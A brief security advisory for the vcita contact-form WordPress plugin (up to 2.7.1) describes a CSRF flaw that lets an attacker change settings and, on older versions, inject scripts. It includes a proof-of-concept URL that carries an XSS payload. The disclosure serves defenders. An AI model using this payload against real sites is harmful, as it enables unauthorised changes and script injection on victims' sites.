Contact Form and Calls To Action by vcita <= 2.7.1 - Settings Update Via CSRF

The plugin does not protect its settings page against CSRF attacks, allowing an unauthenticated attacker to change the plugin’s settings, and on older versions (<= 2.6.4), inject arbitrary web-scripts, by tricking a logged in user with the contributor role or higher to click a link.

PoC

https://example.com/wp-admin/admin.php?page=lead-capturing-call-to-actions-by-vcita/vcita-callback.php&amp;success;=true&amp;first;_name=a-a&amp;last;_name=b&amp;title;=c&amp;confirmation;_token=d&amp;confirmed;=true&amp;engage;_delay=1&amp;implementation;_key=1&amp;email;=a“/&gt;&amp;uid;=a”alert(2);